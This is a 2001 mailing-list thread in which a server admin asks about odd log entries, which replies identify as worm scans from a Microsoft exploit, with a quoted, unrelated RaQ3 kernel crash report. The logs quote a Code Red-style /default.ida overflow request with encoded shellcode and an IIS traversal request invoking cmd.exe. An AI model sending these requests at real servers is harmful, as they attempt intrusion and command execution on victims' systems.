It's automated zombies from one of the previous microsoft exploits. Try
notifying the ISP and/or upstream provider that there's an infected
server molesting you.
Ritch
Pierre Maloka wrote:
>Silly virus scans. They are trying to find NT machines to take advantage of.
>I got hundreds today, and nobody even knows what my website is. I typically
>get < 10 legit hits a day. I wish there was some way to turn these guys in.
>I got over 80 requests from "dsl-64-195-90-29.telocity.com" alone.
>
>>-----Original Message-----
>>From: [EMAIL PROTECTED]
>>[mailto:[EMAIL PROTECTED]]On Behalf Of KAMRY
>>Sent: Tuesday, September 18, 2001 10:35 PM
>>To: [EMAIL PROTECTED]
>>Subject: [cobalt-developers]
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXX
>>
>>
>>
>>Anyone knows about these scans:
>>
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
>>858%ucbd3%
>>u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>>HTTP/1.0" 302 627 "-" "-"
>>
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
>>858%ucbd3%
>>u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>>HTTP/1.0" 302 632 "-" "-"
>>
>>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"
>>
>>-----Original Message-----
>>From: [EMAIL PROTECTED]
>>[mailto:[EMAIL PROTECTED]]On Behalf Of Matthias
>>Pigulla
>>Sent: Tue, September 18, 2001 8:57 AM
>>To: '[EMAIL PROTECTED]'
>>Subject: [cobalt-developers] RaQ3 kernel oops
>>
>>
>>Hi folks,
>>
>>I sent this to the developers list, as I consider this a fairly technical
>>issue, and I hope to find some kernel experts here :)-
>>
>>We've had a lot of trouble with one of our RaQ3 appliances during the last
>>days. To cut a long story short, we checked all RAM modules,
>>installed a new
>>hard disk drive, manually restored from our backups and tried to
>>install the
>>Kernel 2.2.14 .pkg.
>>
>>As to the backups, we made a copy of the entire disk when we first got the
>>machine and we make daily backups. So we copied the "factory new"
>>files onto
>>a new HDD using another linux machine and extracted our daily backup
>>replacing existing files.
>>
>>Now we're stuck with the following messages when booting. I can't
>>figure out
>>what this problem might be related to; we also checked it by
>>installing the
>>same HDD in another RaQ3 with some minor differences in the specs
>>(no SCSI,
>>just one eth interface), getting the same messages.
>>
>> Cobalt Networks - 'We serve it, you surf it'
>> Firmware version 2.3.0
>>
>>ROM Build info: Wed Oct 6 15:23:25 PDT 1999 freakshow.cobaltnet.com
>>System serial number: 3C03AM0127177
>>Memory found: 384 MB
>>Initializing I2C bus: done
>>Scanning PCI bus: done
>>Initializing IDE: done
>> IDE 0 master: found
>> slave: not found
>> IDE 1 master: not found
>> slave: not found
>>Initializing SCSI: done
>>Initializing ethernet: done
>>Initializing EEPROMs: done
>> EEPROM Bank 0: Intel E28F008S5 1MB
>> EEPROM Bank 1: not installed.
>>Mounting rom_fs: done
>>Initializing RTC: done
>>Initializing i18n - language "en": done
>>
>>Press spacebar to enter ROM mode
>>Booting default method - From disk
>>
>>First stage kernel: Decompressing - done
>>Linux version 2.2.12C3 (thockin@freakshow) (gcc version egcs-2.91.66
>>19990314/Li
>>nux (egcs-1.1.2 release)) #1 (ROM kernel) Wed Oct 6 15:16:06 PDT 1999
>>Detected 298807169 Hz processor.
>>Calibrating delay loop... 596.38 BogoMIPS
>>Memory: 14424k/16384k available (1080k kernel code, 416k reserved, 400k
>>data, 64
>>k init)
>>VFS: Diskquotas version dquot_6.4.0 initialized
>>Enabling new style K6 write allocation for 16 Mb
>>CPU: AMD AMD-K6(tm) 3D processor stepping 0c
>>Checking 386/387 coupling... OK, FPU using exception 16 error reporting.
>>Checking 'hlt' instruction... OK.
>>POSIX conformance testing by UNIFIX
>>mtrr: v1.35a (19990819) Richard Gooch ([EMAIL PROTECTED])
>>PCI: Using configuration type 1
>>PCI: Probing PCI hardware
>>PCI: Assigning I/O space 5800-583f to device 00:18
>>Linux NET4.0 for Linux 2.2
>>Based upon Swansea University Computer Society NET3.039
>>NET4: Unix domain sockets 1.0 for Linux NET4.0.
>>NET4: Linux TCP/IP 1.0 for NET4.0
>>IP Protocols: ICMP, UDP, TCP, IGMP
>>IPv4 over IPv4 tunneling driver
>>early initialization of device tunl0 is deferred
>>GRE over IPv4 tunneling driver
>>early initialization of device gre0 is deferred
>>NET4: AppleTalk 0.18 for Linux NET4.0
>>Initializing RT netlink socket
>>Starting kswapd v 1.2
>>Cobalt temperature sensor v1.2 enabled
>>Serial driver version 4.27 with no serial options enabled
>>ttyS00 at 0x03f8 (irq = 4) is a 16550A
>>ttyS01 at 0x02f8 (irq = 3) is a 16550A
>>Keyboard timeout[2]
>>Keyboard timeout[2]
>>pty: 256 Unix98 ptys configured
>>Real Time Clock Driver v1.09
>>lcd: Cobalt LCD Driver v3.01 by
>>lcd: Andrew Bose <[EMAIL PROTECTED]>, Timothy Stonis <tialtnet.com>
>>loop: registered device at major 7
>>Uniform Multi-Platform E-IDE driver Revision: 6.20
>>ALI15X3: IDE controller on PCI bus 00 dev 78
>>ALI15X3: 100% native mode on irq 14
>> ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:DMA
>> ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:DMA
>>hda: MAXTOR 4K040H2, ATA DISK drive
>>ide0 at 0x1f0-0x1f7,0x3f6 on irq 14
>>ALI15X3: Ultra DMA enabled
>>hda: MAXTOR 4K040H2, 38182MB w/2000kB Cache, CHS=12042/16/63, (U)DMA
>>md driver 0.36.6 MAX_MD_DEV=4, MAX_REAL=8
>>linear personality registered
>>raid0 personality registered
>>raid1 personality registered
>>sym53c8xx: at PCI bus 0, device 14, function 0
>>sym53c8xx: 53c875 detected
>>sym53c875-0: rev=0x04, base=0xc0000000, io_port=0x1000, irq=12
>>sym53c875-0: NCR clock is 40037KHz, 40218KHz
>>sym53c875-0: ID 7, Fast-20, Parity Checking
>>sym53c875-0: on-chip RAM at 0xc0008000
>>sym53c875-0: restart (scsi reset).
>>sym53c875-0: Downloading SCSI SCRIPTS.
>>scsi0 : sym53c8xx - version 1.3g
>>scsi : 1 host.
>>scsi : detected total.
>>PPP: version 2.3.7 (demand dialling)
>>TCP compression code copyright 1989 Regents of the University of
>>California
>>PPP line discipline registered.
>>eth0: Invalid EEPROM checksum 0xe50b, check settings before
>>activating this
>>devi
>>ce!
>>eth0: Intel EtherExpress Pro 10/100 at 0x1100, 00:10:E0:01:2B:D3, IRQ 11.
>> Board assembly 000000-000, Physical connectors present:
>> Primary interface chip None PHY #0.
>> General self-test: passed.
>> Serial sub-system self-test: passed.
>> Internal registers self-test: passed.
>> ROM checksum self-test: passed (0xdbd8681d).
>> Receiver lock-up workaround activated.
>>eth1: Invalid EEPROM checksum 0xe70b, check settings before
>>activating this
>>devi
>>ce!
>>eth1: Intel EtherExpress Pro 10/100 at 0x1200, 00:10:E0:01:2B:D5, IRQ 10.
>> Board assembly 000000-000, Physical connectors present:
>> Primary interface chip None PHY #0.
>> General self-test: passed.
>> Serial sub-system self-test: passed.
>> Internal registers self-test: passed.
>> ROM checksum self-test: passed (0xdbd8681d).
>> Receiver lock-up workaround activated.
>>Partition check:
>> hda: hda1 hda2 hda3 hda4
>>VFS: Mounted root (ext2 filesystem) readonly.
>>Freeing unused kernel memory: 64k freed
>>Unable to handle kernel NULL pointer dereference at virtual
>>address 00000008
>>current->tss.cr3 = 00101000, %cr3 = 00101000
>>*pde = 00000000
>>Oops: 0000
>>CPU: 0
>>EIP: 0010:[<c012b4dc>]
>>EFLAGS: 00010282
>>eax: 00000000 ebx: fffffff4 ecx: c0290140 edx: c0290090
>>esi: c02900e0 edi: c0097dc0 ebp: c0003f44 esp: c0003f10
>>ds: 0018 es: 0018 ss: 0018
>>Process swapper (pid: 1, process nr: 1, stackpage=c0003000)
>>Stack: c0003f44 00000000 c0237005 0000000b c0097e0c c012b6bc c0290060
>>c0003f44
>> 0000000b c0236020 ffffffe9 00000003 17ffffb4 c0237001 00000003
>>00006226
>> c012b83a c0237000 c0290060 00000001 c0236020 ffffffe9 c0106000
>>17ffffb4
>>Call Trace: [<c012b6bc>] [<c012b83a>] [<c0106000>] [<c01243f8>]
>>[<c0106000>]
>>[<c
>>012463a>] [<c0109a04>]
>> [<c01db805>] [<c0106000>] [<c01060ab>] [<c010856b>]
>>Code: 8b 40 08 ff d0 89 c3 83 c4 08 85 db 74 0e 56 e8 48 47 00 00
>>
>>Any hints on how I could proceed? How exactly does the RaQ boot procedure
>>look like? I noticed that there are two "stages" in the boot
>>process, and it
>>seems to me as if the first stage boots a kernel from ROM? As we're stuck
>>during the first stage, does this mean I should check my ROM
>>configuration?
>>This seems weird, as the other machine we've tested behaves the same way.
>>
>>TIA,
>>Matthias
>>--
>>
>> w e b f a c t o r y G m b H
>> Matthias Pigulla <[EMAIL PROTECTED]> - Geschaeftsfuehrer
>> Lessingstr. 60 - D-53113 Bonn - Germany - www.webfactory.de
>> Fon +49(0)228-9114455 - Fax +49(0)228-9114499 - ICQ 49185492
>>
>>_______________________________________________
>>cobalt-developers mailing list
>>[EMAIL PROTECTED]
>>http://list.cobalt.com/mailman/listinfo/cobalt-developers
>>
>>
>>_________________________________________________________
>>Do You Yahoo!?
>>Get your free @yahoo.com address at http://mail.yahoo.com
>>
>>_______________________________________________
>>cobalt-developers mailing list
>>[EMAIL PROTECTED]
>>http://list.cobalt.com/mailman/listinfo/cobalt-developers
>>
>
>_______________________________________________
>cobalt-developers mailing list
>[EMAIL PROTECTED]
>http://list.cobalt.com/mailman/listinfo/cobalt-developers
>
>
_______________________________________________
cobalt-developers mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-developers
